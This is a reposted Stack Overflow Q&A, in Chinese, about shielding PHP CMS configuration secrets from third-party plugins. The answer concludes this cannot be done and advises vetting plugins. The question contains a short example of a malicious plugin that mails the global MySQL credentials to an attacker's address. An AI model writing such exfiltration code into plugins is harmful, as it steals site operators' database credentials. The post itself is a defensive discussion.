gpt4 book ai didi

php - 保护 PHP 中的变量不被窃取

转载 作者:行者123 更新时间:2023-12-02 19:49:19 25 4
gpt4 key购买 nike

有一个问题在我脑海里萦绕了很长一段时间。我正在进行 CMS 项目,但我真的不知道该怎么做:我希望这个 cms 可以通过使用插件系统进行修改,到目前为止没有什么困难。好吧,我现在有一个问题:如何保护管理员用户的变量/常量(如 mysql 密码)?例如,在文件 settings.php 中我有

$mysql = array("user" => "admin"...);

如何才能让类(class)不阅读它?一个简单的类(插件)就可以做到

class myplugin extends plugin_container {
function badfunction() {
mail("my bad address", "data stolen", $GLOBALS["mysql"]);
}

一个简单的插件就可以通过这种方式窃取用户的敏感数据。我该如何解决这个问题?

最佳答案

你不能...插件可以执行代码,但你无法控制该代码。

但是,您可以一一批准该插件,以避免潜在的问题。

关于php - 保护 PHP 中的变量不被窃取,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/10401568/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com